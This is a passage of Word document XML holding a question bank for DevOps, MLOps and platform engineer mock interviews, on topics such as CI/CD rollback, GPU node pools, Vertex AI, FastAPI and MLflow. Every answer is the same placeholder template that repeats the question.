        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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did you handle secrets and environment variables in the pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. How did you version your application artifacts and Docker images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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did you version your application artifacts and Docker images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. How did you implement rollback for applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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did you implement rollback for applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. How did you implement rollback for infrastructure changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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did you implement rollback for infrastructure changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Have you provisioned GPU or TPU node pools?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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provisioned GPU or TPU node pools?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. Have you worked with Vertex AI endpoints or similar AI infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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with Vertex AI endpoints or similar AI infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. How did you provision GPU-enabled GKE node pools?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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did you provision GPU-enabled GKE node pools?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How did you manage GPU scheduling and resource allocation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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did you manage GPU scheduling and resource allocation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. How did you control GPU infrastructure costs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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did you control GPU infrastructure costs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. How did you deploy and manage models using Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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did you deploy and manage models using Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. What metrics did you monitor for AI/ML infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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metrics did you monitor for AI/ML infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. If a data scientist or ML engineer asks you to productionize a model, what would be your first question?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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a data scientist or ML engineer asks you to productionize a model, what would be your first question?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. What additional information would you gather before deploying the model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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additional information would you gather before deploying the model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. What infrastructure would you provision for a production ML model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI Infrastructure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infrastructure would you provision for a production ML model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. Are you using any AI tools in your day-to-day software/systems engineering work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AI Engineering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Are you using any AI tools in your day-to-day software/systems engineering work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. How do you use AI tools in your daily workflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AI Engineering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use AI tools in your daily workflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. Can you give a practical example of how AI improved your productivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AI Engineering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Can you give a practical example of how AI improved your productivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. How do you ensure AI-generated code or recommendations are safe for production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AI Engineering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ensure AI-generated code or recommendations are safe for production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. How do you think the Platform Engineer/DevOps role will evolve as AI becomes more embedded in software systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AI Engineering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you think the Platform Engineer/DevOps role will evolve as AI becomes more embedded in software systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. What new responsibilities do you think Platform Engineers will have in AI-driven organizations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AI Engineering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new responsibilities do you think Platform Engineers will have in AI-driven organizations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. Do you think AI will replace DevOps engineers, or how will it change the role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AI Engineering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 you think AI will replace DevOps engineers, or how will it change the role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 80 - Senior MLOps and Platform Engineer Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. You moved from DevOps to MLOps. How long have you been working in MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps Experience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You moved from DevOps to MLOps. How long have you been working in MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Can you talk about your work in MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps Experience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Can you talk about your work in MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Walk me through one ML application that you helped productionize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps Experience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Walk me through one ML application that you helped productionize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Have you built any FastAPI services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the FastAPI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built any FastAPI services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Can you describe one FastAPI service you built?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the FastAPI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Can you describe one FastAPI service you built?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What endpoints did you expose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the FastAPI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endpoints did you expose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Why did you design multiple endpoints instead of just one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the FastAPI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Why did you design multiple endpoints instead of just one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How was the overall API designed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the FastAPI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was the overall API designed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How did you authenticate and authorize users of your FastAPI endpoint?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authentication &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Authentication &amp; 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did you authenticate and authorize users of your FastAPI endpoint?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How did you ensure only authorized users could access the service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authentication &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Authentication &amp; Security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did you ensure only authorized users could access the service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Where have you used MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLflow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Where have you used MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How did you use MLflow in your project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLflow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did you use MLflow in your project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Was model versioning required?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
